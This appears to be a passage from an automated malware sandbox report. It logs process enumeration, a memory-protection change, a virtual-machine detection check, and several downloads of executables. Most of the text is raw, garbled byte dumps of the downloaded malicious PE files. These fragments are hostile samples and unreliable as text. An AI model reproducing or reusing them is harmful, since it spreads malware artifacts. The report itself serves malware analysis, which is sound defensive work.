Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 652	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 720	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 796	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 844	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: audiodg.exe process_identifier: 924	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 992	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 348	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: spoolsv.exe process_identifier: 1064	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 1120	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: taskhost.exe process_identifier: 1132	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: dwm.exe process_identifier: 1208	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: explorer.exe process_identifier: 1236	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 1332	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 1728	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: pw.exe process_identifier: 1860	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: SearchIndexer.exe process_identifier: 1904	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: SearchProtocolHost.exe process_identifier: 744	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: SearchFilterHost.exe process_identifier: 1984	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: pw.exe process_identifier: 2100	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: taskhost.exe process_identifier: 2140	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: Lixygaevymi.exe process_identifier: 2724	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: Hyvacaerufe.exe process_identifier: 2832	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: foldershare.exe process_identifier: 2916	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: WmiPrvSE.exe process_identifier: 2304	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: iexplore.exe process_identifier: 2548	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: iexplore.exe process_identifier: 2672	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: svchost.exe process_identifier: 2852	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: taskhost.exe process_identifier: 2612	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: cmd.exe process_identifier: 1772	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: cmd.exe process_identifier: 812	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: conhost.exe process_identifier: 1084	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: conhost.exe process_identifier: 1848	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: BumperWW.exe process_identifier: 2552	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: ww15_testLL_0310_single.exe process_identifier: 2436	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: mscorsvw.exe process_identifier: 3100	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x000004ec process_name: mscorsvw.exe process_identifier: 3168	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: sppsvc.exe process_identifier: 3260	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: any.exe process_identifier: 3452	1	1
Process32NextW Nov. 5, 2021, 9:07 a.m.	snapshot_handle: 0x0000000000000028 process_name: conhost.exe process_identifier: 3488	1	1

Changes read-write memory protection to read-execute (probably to avoid detection when setting all RWX flags at the same time) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory Nov. 5, 2021, 9:06 a.m.	process_identifier: 2672 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 4096 protection: 16 (PAGE_EXECUTE) base_address: 0x05fc0000 process_handle: 0xffffffff	1	0	0

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 5, 2021, 8:58 a.m.	flags: 15 family: 0		111	0

An executable file was downloaded by the processes kak.tmp, dybala.exe, bumperww.exe, ww15_testll_0310_single.exe (21 events)

Time & API	Arguments	Status	Return
InternetReadFile Nov. 5, 2021, 9:05 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL'þúà"0L¼¾j @ ` @pjKx¸@ H.textÄJ L `.rsrcx¸ºN@@.reloc@ @B jH@æ0+DqÙ),%$KÕ-×sL~%þ½~82êÉTGw7, üm,p^.k-°\|%YàÅ®IT£K¸)Ãý·!É¦QÁðOÄ+d z ÁÓý3äÏ ¥Ð¹>2;ã; L¤ÐöõkðFK}àáÆÉ¶¢¿z*à}ÜÓ ÂåàZxÎy ÏóÚJÊIBÄÖo®8)<ê°²}K÷ø]ÜX4}\|zDxÒ¤XíBÚóùAsñ=>ÂMqôkEñÕª_W ½{Ju¦·C +{øSíj}ºØ]0T°¥q0¯ ÿ7Ê¡{Õkq§OäMiøzØõ¢úOqè¥qþÖCØÕ¬1=j¥ uÄê²ñ=åKrÝwvÓ´-Í@ezÃ²aw^(/µxÄú¥ö°!îËu++-ô1 _eç6À-¾%FÔ~ÏÇÉ8}þùBY¾1ïûð&ÊV¶=G®M/à!Gàá÷Ã?i request_handle: 0x00cc000c	1	1
recv Nov. 5, 2021, 8:58 a.m.	buffer: HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:05:56 GMT Server: Apache Last-Modified: Mon, 01 Nov 2021 16:41:58 GMT ETag: "59a00-5cfbcdaf76180" Accept-Ranges: bytes Content-Length: 367104 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL aà"0x î @ à@S ØÀ H.textôv x `.rsrcØ z@@.relocÀ@BÐHÐsÈ">Y0¢{¾7îV<Vú8è;Ù´¬4«Ê§a!;Øi×ðSåyñ³)vrd6«ìeJ½UùuCRyØµgSWfW!Jà ®}¸ÒàÒ=¹Á_¡;¼äÒ£Öå ï ^7ÆÍb¢»+ÐO2 ¡% pî'O0\_@Ó²ã=¥ßbòìÇÿx¡sÚü>ÞðjêÂÂBH0çÁËwI¦êÂ-ø½·H"½U»CQùÇÒîvÐI¢bâ°ûï ÕÚÑhýEñòC=Ä7HÇ@,½«F°Äfæìç®ªU¾ ¨zîÐuüª·I â3éR,üÙAÒµ£àgîÖ$Êr,0ûYR9+âÓïENháü[³uô6J¬NÏ××NoÒþH]¢êoÐXaÀDôêì]mÁ£N¯!)äÍ¿Íµoåµ'{Ài5Àð6U·Ià¦E5\ü÷ØTuu~¿í¸IQDÅ»QG°ûB-RÚ\N\¥`ahøüs\|{E¶¼)8¾ÁÀ°bgÞ¶I¾9(#ÂÑùqÞÒOëù«ô1ÌnÒ.õôTñÒÃÂ$¹[ÒûÌûÄCg7qÇ}"D»9 Qé8Þ4AÞM-eOPÄÒÞi Cgë¼æWíYÖæë9.þºïZR/¿òcJîD½]Xn¤IÚWLIødòçáûÙìäp¹-}+îá¯'àEì¼¢$GÞRßD1ðUÀ~{¶T}ÂHkc]»ÿÚ¨b'\|IÛ ÕK÷8´ºØ¥Wõ:òw.+úXQ#3fUÚp/ö:`æ¬Ðã÷£%¿!yVdñXÉLl¥ÐÅC0¶¬ù%Å°óKÑ_´³zH^êúÞæg6×Y¶{t2\|ãâ,éöÔ)ô5ÑãÉ_[Ø¥±c9Ò²¾O§¼ÀÓOÅSO&2¬Þ×ÔÈÏ_@a×½H«ÏÌå¶zìiäÎæ[\|§ÓTãZ?#Fn42¼ÙFÚj7Å ~ÇSumkY³7rS¼Î°&ÞÒ¢w<ÓýÏÀ¡²Ù(^öµàfÆÍWí!Ó=»»;Óùþg8¾"7@^0u!{Ç¡A09.Ór¼2N =à¦Ò#s«~¨?ÇÁE,GÅ½_LSÖ_eµÊgÎºñ¯ðd°2XÍùÌ¤0$3 ÷)$'C9Em#s«~¨?ÇÁE,Ò?(éÐvðß,ãñÆ ¿+HÚ,PÓsÒyoºýÜNÌ)òmLà,bÕ§É#¨`S#×ÛÀÊÈ ££ðí®û¾xÒÒ!mBå.¶«'"¶rÕÛõheæb÷pçÙÓsy=ç·U¸Éé_U%û¤RéWñCP'OwìQ0yÇ 8µ¹ÕU=SÐÿ¿KÏKá´¡1g-fà 6<lRh½aGU¬¾+8$¹)È ÂÏMÎÞîOPðór)¨·¥PÖ;á\|cÖVìµ.î³ô&[ûä¾-àÊùÅÚ5¨SP-¬6QüHu;`ûã5&£¡/Ï%¥Ý¸æh%ê÷äáró`Ú¼wÌ®BdíÜ¾±[Ô¢ÐÛBM,.>^±¾ÙOÝEQ3·¤ó'îß xr«~ÿóZRRg©© &5"LÍA©¿Â½/fÌÔ4+óðHöé·×»bñnböÃëCi¦ø`f ×{{³Ö.\9Çné%Ý9ÌèÃ¾rãûGô!Cÿ&éÌ»^GyK©7â>ì?`jméhÛMï].)Ú.¶àGYì#äËxµ ¶¹ó=]Tó!æèÌÌ%jð¬vbÌ:íV}r â¦LFd®é©çu¹î§%ÁyÎØ»©ÊøÞ¶úÇiåc¸$þ8ØjsÚ%b5vØÿÂhN ¬ó¬# òxÑ~øO¹±ðäU/ÙAº»rE,æ½ªÊ>réÂz·KÕ)Ø¨H píY¡O${~¢üæy#/mØÌ7Ë·ò¹¢z<1(HÜLÓÀXXê4³A) ©ª£ÓcA¤I0Ù¯ÈÅ^M§êwÒúºeò7U^÷bõ±ÖR` #î´¸ê¥¨¦6'4±½¬J¤gt÷Ý xí¾(Ïu¨"®©XÂ&\ß }ïÃÕMÓüO:3¬l¡0]Â>iC\ë=XÁãßk¶ÞþõÍwwQ7ñ,õiè¥}PrYl¶ý î89{º¯Dr£ä=MÄé {àÿ;·þCá9¼ ¥®¡ö,õàûJ¾m5Pbü1'nÆ«S(\&úÁëz`çÓaqßdTBÛ´,¾#-J0müuðYÌYªu»áË&Kú~F8*$°¸Øã{ÐJ received: 2920 socket: 1444	1	2920
recv Nov. 5, 2021, 8:58 a.m.	buffer: HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:06:04 GMT Server: Apache Last-Modified: Mon, 01 Nov 2021 16:08:48 GMT ETag: "88400-5cfbc645a6400" Accept-Ranges: bytes Content-Length: 558080 Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELèaà"0pÎ @ à@K @À H.textÔn p `.rsrc@ r@@.relocÀ@B°HH#8kY×ïdðuÙqøß+8_WCr]E÷Ìx:.1\í(ìÄf5¥Ã[?míjOc¢áÚaÄ¿ãrÓxt7X£VuT´Q<Ð4æ¬ËÝ ±ï=Ó` ÁÈÞrOÖÏävúï&2ìà`ïó÷\|¾nÈ .r0ÞEêj¸×):2Y´ÊØWÀ(b½ÜÿVÄ.ÄCw$9½wmákB"Éa¦Ñ<<nÇâ¡¢4S üü/1:Lzâç8{m0u07¯l={éÏ©êÊã±bëñÌÍ"£3çï\|i.I!dç ó+Oò5õ$÷á»"h¯Ç 4:è,æ¯Ú@¶¸\|¿¶ïNâwÒ+ÛIyvG\|CAãb(Uó§Dáºtüq=î+sÌAãÇùjÌ[ädéõø%¯@3Î^E÷G;hèMvò«³ãÄ¶vwÓ¢QÈßìàÒ^òÝ`oéÇ>AÓÁ^wì~F³T9ÔÔÂéÛ Æ?\|ÊCçoãísøê9Ò¥¡7ÆIº£"ÁØ«ëb¨¨C{/9?TD ÞKÓ¤oÆÓ0ÂKIa[F±íå)$¹E²@âþBÇçmó+Íob>Qªªí+¾$âÄî4 ý»Ô\¥}mÈ0ð?í±ö~~ðdwÒ½iÓ¡©;-¯Á{N$øèk{«Ã^ù×}ü¾µá»Zf[Ë°6ÚÂ~Î<®` íFøJü½ÔÅ"V¾¹ 9ÎÚÈºYòT[]ý!ê¿H¯Ü·ßrµ±SíðYªüú©®Wý®î!X ÿáërÀ`p%¼#3«nö"Ì}vsÛ°A{0UùA°8>£ÿm]t íÓÖK!kúD_ÒæZOÈÔñ`Æ;»ð~O}5Xé%_L]û¢µôî·eÛ }6m+9»i!fÄHK^§sµ¯ÉýèðÛ`ô6^YõåÚÞq£ ü±ÅóÄªÈxÍ?Eè¡É(Í£Fû'ÐÔ?8Â3?x Å¡cJ<hPÌWsÿÑÜKìñS½.\XJÍ8îç7±¯0â«ÇÄ?l»ëp!sZ©=±Å(öð RÞyè6ÒöÎñE@P¶z³©ÿX®¥«ßÜ¿Z}%5%~®7áu<áDiBzÆn(°îÌi`:úU&á Óh¾ÑX;7bzê§·nèÑÛ9uso´î¬ ús&[ÞWðb^ÜÅÈÏ8dgÍUd1ªÎ¬9üEôüý=Õ}¥ÙÉÒåÇ¼%Õ#ev,qiïÐÜLpsjje¦WgnAF~÷{ÒAÎß_=tv±5C4O'ñ²£[ÖxÄ1¤BæQy:µQBóñCYo=7-üG.<XßÄÁ,u"Ê+jºq¦T RÁö¿ÉÑ>{`×EÚÀÖØF¹ê«á_h¿Ôrx~ÖN¸ði®dÄéUOm<gN¶·ÿ6\ñ4'Ô)F±Ñx«è¤È_·ö>êêt¸p¯TCíÀÂA±¼8F/Öp«xÊ²lí,U±"K´Ñ%ëcR©RVmÊÒèIÿ#ÍæºO:º×lu±ýØ3#÷¢rê+×¨Ñ½É¸QÒÙ^îôÚÉ³úiIøæIçfÐ®³£åCö& âOHq,_yóªVÌÿk2Ü0ºí<ìÂ³OÞéP+ÕX·+²®db/&ö ë§õ\¹kxÍ¤±¹Pð-`¯Å7Ä¶Ð6S©Èêû}´¨þP!ÑDéO¬Ï§Ìg×10îô;YHüG¶^1§<^Ei×;Áí+9xá[h}kñþfÊ >µbËâðéñvÞ² ï@váUÑu³¿«¥àt~¥aû¸)pÌëE£ÞÁ/ÿ&C¡öÒÒª\|ÕwBØhX?Tù9äê¹T¡jÅ³ÃÜõCi×öÔô$FîÊÞ4lG!ÿ9Ê R¹rHùÂõ"\| û«íHó¦ñ+(\|\_k[cK@RJ ºòþ!D!«~ï¾ÓÏëýá ?è'J¤&T ~{oª]õ¡ízçCàÀ¶XMÊcÏ>qZ½ ©ÑÅýôJ§8y¡UÙéYUNõÈTSÖå}õùÝ}ñI.ua7©ÕÈ$ ¾s hABy}È¶ävMoå«Qà#`;b6$áæùÇ"gWO¸£È ª§¾ª¾«wSýá]H^ãÓ5óy<oK^ï_Á¦+øMcgå3b¬±çèf`ªËp¾~Qþë þ¼Ì( Pnû!ÕïÊ¤©QÙÞikÃÓ,ä¼güz¯hðÑ'ç38Zx-Ï0ê"äMæ8(¿%bÐ²ÃB #ñ9\|¤Õo×=ÀêJEàÎQ9´jó}ç«¥J received: 2920 socket: 1444	1	2920
recv Nov. 5, 2021, 8:58 a.m.	buffer: HTTP/1.1 200 OK Date: Fri, 05 Nov 2021 00:06:09 GMT Server: Apache Last-Modified: Mon, 27 Sep 2021 13:36:56 GMT ETag: "bc800-5ccfa30ca2e00" Accept-Ranges: bytes Content-Length: 772096 Content-Type: application/x-msdos-program MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELå Qaà"0 ¼Ú( @@ @(O@¸P' H.textà `.rsrc¸@º@@.relocÆ@B¼(H´/´hMèÙ6( (0rps %rpo r'po r?po rIpo rSp-o rpo o r]po o ¥1,rups zÞo r«p( &Þ{o {o {o (0(s o 3{o! o" &&ò{o# o$ 1{o# o% o& (&r¹p(' &0Qrñprpr-p(( s) r1po o r]po o ¥1Þ ,o Ü)E (0µ{o+ o, rñprps- s. o/ o0 +co1 t6%r?po2 t6¢%rIpo2 t6¢%r'po2 t6¢s3 {o+ o4 &o5 -Þ,o* Ü,o* Ü1o %ª 0(s o 3{o! o" &&0z{o# o$ 1[{o# o% o6 o7 o8 (9 o6 o7 o8 (9 r?po6 o7 o8 (: &r¹p(' &z,{,{o (; *0IÐ(< s= s> }s? }s? }s? }s@ }s@ }sA }sB } s@ } sB }sC }sA }sA }sD }sC } sB }sD }{oE {oF { oE {oF (E {oG {oH %{¢%{¢%{¢oI {oJ {oK {.sL oM {sN oO {rYpoP { ÜsQ oR {oS {oT {oU {oV {r?poW {hoX {rIpoW { oX {rmpoW {}oX {oY {`sL oM {sN oO {rwpoP {WsQ oR {oT {rpo" {oY {@sL oM {sN oO {r¡poP {WsQ oR {oT {r¯po" {oZ {x<sL oM {sN oO {rÉpoP { _sQ oR {oT {råpo" { o[ { + sL oM { sN oO { rípoP { dsQ oR { oT { rûpo" { o\ { þs] o^ { oY { sL oM { sN oO { rpoP { _sQ oR { oT received: 2920 socket: 1444	1	2920
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $I4! Uîr Uîr Uîr>êsUîr>ísUîr>ësUîr:êsUîr:ísUîr:ës$Uîr>ïsUîr UïroUîrË:çsUîrË:rUîrË:ìsUîrRich UîrPEd\Ì<að"z\|7@P`TÔ(0è´@Ðµ8¶0¨.text¥yz `.rdataTMN~@@.dataàÌ@À.pdata´Ø@@_RDATA î@@.rsrcè0ð@@.reloc@ò@BH 9yéÌ$ÌÌÌÌHAíÃÌÌÌÌÌÌÌÌHT$LD$LL$ SVWHì0HúHt$`HÙèÊÿÿÿE3ÉHt$ LÇHÓHè<HÄ0_^[ÃÌÌÌÌÌÌÌÌÌÌÌÌ@SHì HÙHÂH õWÀHSHHHèc1HÃHÄ [ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQH%HÒHEÂÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHì HHùHÚHÁè1öÃt ºHÏèì#H\$0HÇHÄ _ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌHQHHÁéY1ÌÌÌÌÌÌÌÌÌÌÌÌÌH±HÇAHAH¾HHÁÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌHìHHL$ èÂÿÿÿH³ÂHL$ è!3Ì@SHì HÙHÂH ÕWÀHSHHHèC0HXHHÃHÄ [ÃÌÌÌÌ@SHì HÙHÂH WÀHSHHHè0HHHÃHÄ [ÃÌÌÌÌH\$Ht$WHìpHçÍH3ÄH$`3öÿ<~ø3ÒNÿï}HØHD$ HøÿtF3ÒA¸0HL$0è·4ÇD$00HT$0HËÿ}Àt9\|$8tHT$0HËÿÁ}ëæt$PHûÿt HËÿ´}ÆH$`H3ÌèL$pI[IsIã_ÃÌÌÌÌÌÌÌÌÌÌÌÌÌH\$WHìHÍH3ÄH$HÙ3ÀHHAHA3ÒHÿ}HøHD$ Høÿ3ÒA¸0HL$Pèâ3ÇD$P0HT$PHÏÿ¬\|Àt_LD$XHT$\|HL$(èÜHÐHKH;Ktè*HC(ëLÂHÑHËè¥HL$(èKHT$PHÏÿ¥\|Àu©Hÿÿt HÏÿ\|HÃH$H3ÌègH$¨HÄ_ÃÌÌÌÌÌÌ@SHì HQHÙHú request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: rSÑ<¡ö?ÀÐ:Gö?hhö?g6qö?ù"Qjìaö?£J;ORö?d!YÈBö?ÞÀ¸V3ö?@bwú#ö?®1h³ö?X`ö?ü-)4döõ?çÐ¸[çõ?¥âìÃgØõ?W+Éõ?úGÆ¼ºõ?ÀZk¬õ?ªÌ#ñaõ?íX0Òõ?`XVõ?:kP<íqõ?âR\|ºcõ?UUUUUUõ?þ»æ%Gõ?ëôH 9õ?K¨Vÿõ?øâêõ?ÅÄá"õ?PPõ?LÝbóô?9/§àåô?L,Ü¾CØô?n¯%¸Êô?á¦Ý>½ô?[¿R Ö¯ô?Jv¢ô?gÐ²ã9ô?H"ô?{®Gázô?f`Y4Îmô?ÏõÇË`ô?ÊvÇâÙSô?ûÙbeøFô?Mî«0':ô?Õ%f-ô?QY^&µ ô?ô?feÑô?û°?ûó?¯¥Bîó?©ä¼,âó?ÆuªÙÕó?ç«{¤Éó?U)#Ù`½ó?;±;±ó?"Èz8$¥ó?c,ó?fÓ"ó?88ó?îEÉÑ[uó?HÞóió?ø_Î]ó?Áx+ûRó?Fà¬yFó?²¼W[ä:ó?újí\/ó?¿+Jã#ó?¶ëéXwó?Ñ0 ó?`ÄÈó?h/¡½öò?KÑþ¡Nëò?KÀ%àò? P- Õò? ,MûÉò?7Zù¾ò?@+´ò?Áó©ò?ä)Aò?¥¸[rò?°°ò?MÎ¡8ú}ò?5'¸Psò?'Ö\|³hò?ñp"^ò?²w~Sò?$I$Iò?[`·>ò?ß¼xV4ò? "*ò?xû!·ò?æUHyò?ÙÀgGò? ò?pÁ}÷ñ?L¸<ôìñ?t¸?;ïâñ?½J.gõØñ?¢Ïñ?Yàü"Åñ?)íF@J»ñ?ãºòg\|±ñ?{a¹§ñ?àñ?¢Sñ?Û+°ñ?ñ?Öwñ?ysBnñ?2üPdñ? 'u_[ñ?ÉÕý£¹Qñ?;Í _Hñ?$G4?ñ?È5È5ñ?¬Àí,ñ?30]çX#ñ?&H§0ñ?ñ?¾ûñ?ðþðþð?¢%³úíõð?ækõìð?`Uäð?F¨ Ûð?:5VDÒð?;Ú¼OqÉð?qA§Àð?È%ìæ·ð?µì.r/¯ð?§h ¦ð?`¯¦Ûð?T 9?ð?âeu³«ð?B!ð?âê¸){ð?Æ÷G &sð?ûyµjð?ü©ñÒMbð?ur îYð?4×÷Qð?ÅdÌIIð?AAð?üG·Æ8ð?^µ0ð?é)wüd(ð?@ ð?7zQ6$ð?ð?ð?ð?log10ÿÿÿÿÿÿ?Cÿÿÿÿÿÿ?ÃUnknown exceptionbad array new lengthabcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZpidhtmpfile.tmp.dllpidHTSIGwbTaskmgr.exekernel32.dll%uLoadLibraryAvector too longstring too longMZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞévMÞévMÞévMÊrLÕévMÊuLØévMÊsLGévMÕrLÐévMÕuL×évMÕsLýévMÊwLÝévMÞéwM¼évMLßévMMßévMtLßévMRichÞévMPEd Ì<að" ¶øTZ`¬z(àà°ÜðX8ÐX0Ð.textÅµ¶ ` request_handle: 0x00cc000c	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZPÿÿ¸@º´ Í!¸LÍ!This program must be run under Win32 $7PEL^BàF\|hT`@0w³@°ÜðàCODEÌDF `DATA(`J@ÀBSSõtÀ.idata°t@À.tlsÐÀ.rdataà@P.relocð@P.rsrcÜ¨@P ²@P@Byteÿ@ Stringl@l@8.@D.@H.@L.@@.@-@8-@t-@TObjectÿ% ²BÀÿ%²BÀÿ%²BÀÿ%²BÀÿ%²BÀÿ%²BÀÿ%,²BÀÿ%²BÀÿ%²BÀÿ%²BÀÿ%ü±BÀÿ%ø±BÀÿ%<²BÀÿ%8²BÀÿ%4²BÀÿ%ô±BÀÿ%H²BÀÿ%D²BÀÿ%ð±BÀÿ%ì±BÀSÄ¼» Tè¡ÿÿÿöD$,t·\$0ÃÄD[ÃÀÿ%è±BÀÿ%ä±BÀÿ%à±BÀÿ%Ü±BÀÿ%Ø±BÀÿ%Ô±BÀÿ%Ð±BÀÿ%Ì±BÀSÄô»ÐB;uYhDjè¦ÿÿÿD$\|$u3À$ëPD$ÌBD$£ÌB3ÀÐÒL$TÑT$T$ T$@øduÜD$D$D$$$Ä[Ã@ÃÀSVÄøòØèfÿÿÿD$\|$u3Àë:T$BFT$B$D$$D$X$T$PD$°YZ^[ÃÄøP$T$$L$ T$$JÐB£ÐBYZÃÀSVWUÄøÙðüBCD$RÊ/M;Èuèÿÿÿ@@CëC;Ðuèqÿÿÿ@CD$;7u®ÓÆèúþÿÿÀu3ÀYZ]_^[Ã@SVWUÄð$ôD$ @;ÈØ>_ùz;ßrv;Èu!BAB)BxuVèðþÿÿëMØ>_ùz;ßu B)Bë3Z\$>.}+û\|$+ÈHT$èMþÿÿÀu3Àë°ë;D$Yÿÿÿ3ÀÄ]_^[ÃSVWÚðþ}¾ëÆÿÿæ request_handle: 0x00cc0048	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@øº´ Í!¸LÍ!This program cannot be run in DOS mode. $¿´ºûiÚéûiÚéûiÚéïÙèñiÚéïßèaiÚéðÞèêiÚéðÙèìiÚéðßèÑiÚéïÞèîiÚéïÛèòiÚéûiÛéiÚé=ÓèþiÚé=%éúiÚé=ØèúiÚéRichûiÚéPELÚeaà,ðe¤@@P@°ãdè ¸%¶8À¶@@È.textß+, `.rdata ®@°0@@.dataìðà@À.rsrcèì@@.reloc¸% &î@BUìhØE¹àFèþhÀ;Eè´Ä]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌSÜìäðÄUkl$ìì¡ðE3ÅEü3ÀEß3ÉMÞ3ÒUÝEßEØMÞMÔUÝUÐÇE¸EÇE¼äÀñE¸E M¼M¤ÇE°x>XÇE´ÑHU°U¨E´E¬M MÈÇEà7k®ÇEääÀñÇEèx>XÇEìÑH3ÒUÜEÜEÌ(Eà)EMÈ)E(EfïE)pÿÿÿ(pÿÿÿUÈEÈEÄMÄQ¹øFèõhÐ;Eè«ÄMü3Íè&å]ã[ÃÌÌÌÌÌÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèÄEüå]ÂÌÌÌÌUìQMüEüÇ4BEMüÁQèÀÄå]ÃÌÌÌÌÌÌÌÌÌÌÌÌÌUììMüEüxtMüQUøëÇEø¬EEøå]ÃÌÌÌÌÌUìQMüEüÇ4BEMüÁQè`ÄUâtjEüPèÓÄEüå]ÂÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÇ@ÀEMüÇ@BEUüÇ¼BEEüå]ÃUììMôè²ÿÿÿh<âEEôPè_¡å]ÃUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèIÄUüÇ@BEEüÇ¼BEEüå]ÂÌÌUìQMüEüÇ4BE3ÉUüÂ JEüÀPMÁQèùÄUüÇ@BEEüå]ÂÌÌÌÌÌÌÌÌÌÌÌUììEÁ#U EMôºkÂÿMôUøÇEðE+MøMü}ür}ü#wë èÅ3Òu÷3ÀuåMUøå]ÃÌÌÌÌÌÌÌÌÌÌÌUìjÿhxEd¡Pìx¡ðE3ÅEðPEôd£ÇEMØè)ÇEüÇEÐÇEÌEEMéM}`UEÇM request_handle: 0x00cc00a8	1	1
InternetReadFile Nov. 5, 2021, 9:07 a.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!This program cannot be run in DOS mode. $Ua÷ÀÀÀ~v2À?À~vÀ3À~v3ÀÀx ÀÀÀÀ~v6ÀÀ~vÀÀ~vÀÀRichÀPELå[©_à ¶HKðÐ@PQX¹PPÑàP0¨t@à.textµ¶ `.data°JÐº@À.pakalåðOÒ@À.rsrcÑPÒÖ@@.reloceàPf¨@B¼»Ü»ø»¼¼"¼:¼X¼p¼~¼¼¬¼¼¼Ø¼è¼ö¼½½.½D½`½x½½½®½¾½Ú½ð½¾ ¾<¾P¾`¾t¾¾¾¸¾Ð¾æ¾ö¾¿(¿>¿X¿n¿z¿¿ª¿¼¿Ê¿ê¿þ¿À*À:ÀPÀ^ÀìÄÜÄÔÀàÀòÀÁ$Á<ÁTÁdÁxÁÁ¨ÁÆÁÚÁêÁÂÂ"ÂJÂXÂpÂÂÂ°ÂÆÂàÂøÂÃ Ã:ÃFÃPÃ^ÃjÃÃÃ¦Ã¶ÃÂÃØÃâÃôÃÄÄ.Ä>ÄPÄ\ÄjÄvÄÄÄ®ÄÀÄÐÄúÄÀÀ²ÀCpC DðuDà±D@âCÐD EÀC?a:uivscanff:\dd\vctools\crt_bld\self_x86\crt\src\scanf.c(format != NULL)fmodzC¶COC¶CC¶COC¶CMCMCwCMC¶C¶COC¶Cð?ð?33ð¿0Cÿ( (_Stream->_flag & _IOSTRG) \|\| ( fn = _fileno(_Stream), request_handle: 0x00cc0120	1	1
